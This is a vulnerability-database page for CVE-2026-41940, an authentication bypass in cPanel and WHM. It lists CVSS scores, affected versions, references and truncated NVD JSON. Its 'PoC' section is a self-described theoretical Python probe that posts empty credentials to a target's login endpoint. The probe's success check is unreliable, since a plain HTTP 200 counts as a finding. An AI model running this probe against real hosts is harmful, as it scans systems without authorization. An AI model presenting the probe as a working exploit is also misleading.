CVE-2026-41940

Description

cPanel and WHM versions after 11.40 contain an authentication bypass vulnerability in the login flow that allows unauthenticated remote attackers to gain unauthorized access to the control panel.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:cpanel:whm:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:cpanel:wp_squared:*:*:*:*:*:wordpress:*:* - VULNERABLE

cPanel and WHM > 11.40

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_cve_2026_41940(target_url):
    """
    PoC for CVE-2026-41940 (Authentication Bypass)
    Note: This is a theoretical PoC based on the vulnerability description.
    """
    # Target endpoint usually involves a login or session creation URL
    login_endpoint = f"{target_url.rstrip('/')}/login"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    
    # Payload attempting to bypass authentication
    # The actual payload depends on the specific flaw in the login flow
    data = {
        "user": "",
        "pass": ""
    }

    try:
        response = requests.post(login_endpoint, headers=headers, data=data, timeout=10, verify=False, allow_redirects=False)
        
        # Check if we get a valid session cookie or a 200 OK on a protected page
        if "cpsession" in response.cookies or response.status_code == 200:
            print(f"[+] Potential Vulnerability Found at {target_url}")
            print(f"[+] Response Status: {response.status_code}")
            return True
        else:
            print(f"[-] Target does not appear vulnerable.")
            return False
    except Exception as e:
        print(f"[!] Error: {e}")
        return False

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python poc.py <target_url>")
    else:
        check_cve_2026_41940(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41940
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41940
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41940/
[4] VulDB https://vuldb.com/cve/CVE-2026-41940
[5] https://docs.cpanel.net/release-notes/release-notes
[6] https://docs.wpsquared.com/changelogs/versions/changelog/#13617
[7] https://support.cpanel.net/hc/en-us/articles/40073787579671-cPanel-WHM-Security-Update-04-28-2026
[8] https://www.namecheap.com/status-updates/ongoing-critical-security-vulnerability-in-cpanel-april-28-2026
[9] https://www.vulncheck.com/advisories/cpanel-and-whm-authentication-bypass-via-login-flow
[10] https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/
[11] https://www.bleepingcomputer.com/news/security/critrical-cpanel-flaw-mass-exploited-in-sorry-ransomware-attacks/
[12] https://github.com/watchtowrlabs/watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py
[13] https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-41940

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41940", "sourceIdentifier": "[email protected]", "published": "2026-04-29T16:16:25.037", "lastModified": "2026-05-04T18:09:42.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "cPanel and WHM versions after 11.40 contain an authentication bypass vulnerability in the login flow that allows unauthenticated remote attackers to gain unauthorized access to the control panel."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "cisaExploitAdd": "2026-04-30", "cisaActionDue": "2026-05-03", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "WebPros cPanel & WHM and WP2 (WordPress Squared) Missing Authentication for Critical Function Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.40", "versionEndExcluding": "86.0.41", "matchCriteriaId": "D018D47F-B020-41B1-8755-9197EB8673D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:*", "versionStartIncluding": "88.0.0", "versionEndExcluding": "110.0.97", "matchCriteriaId": "9BF3DBAC-D629-44A9-B102-2D8F82709CA2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:*", "versionStartIncluding": "112.0.0", "versionEndExcluding": "118.0.63", "matchCriteriaId": "3EEFF12C-11E8-4A5C-9C72-BA1A422A9E72"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:*", "versionStartIncluding": "120.0.0", "versionEndExcluding": "124.0.35", "matchCriteriaId": "5533AA73-5007-4820-A5C6-0460C486882D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:*", "versionStartIncluding": "126.0.1", "versionEndExcluding": "126.0.54", "matchCriteriaId": "15C0513D-8C56-4C5F-B818-E2CE90223AD4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:*", "versionStartIncluding": "128.0.0", "versionEndExcluding": "130.0.19", "matchCriteriaId": "B5FE32EC-AEFB-4B27-AE65-A95432CAA812"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:*", "versionStartIncluding": "132.0.0", "versionEndExcluding": "132.0.29", "matchCriteriaId": "24982921-6C0D-478E-BBF1-7C9DC7023760"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:*", "versionStartIncluding": "134.0.0", "versionEndExcluding": "134.0.20", "matchCriteriaId": "B0213A2B-4A5A-4098-87FF-517E33F96807"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:*", "versionStartIncluding": "136.0.0", "versionEndExcluding": "136.0.5", "matchCriteriaId": "09F99F08-1FB9-4BC6-8C7D-52062BA28479"}]}]}, {"nodes": [{"operator": "OR", "neg ... (truncated)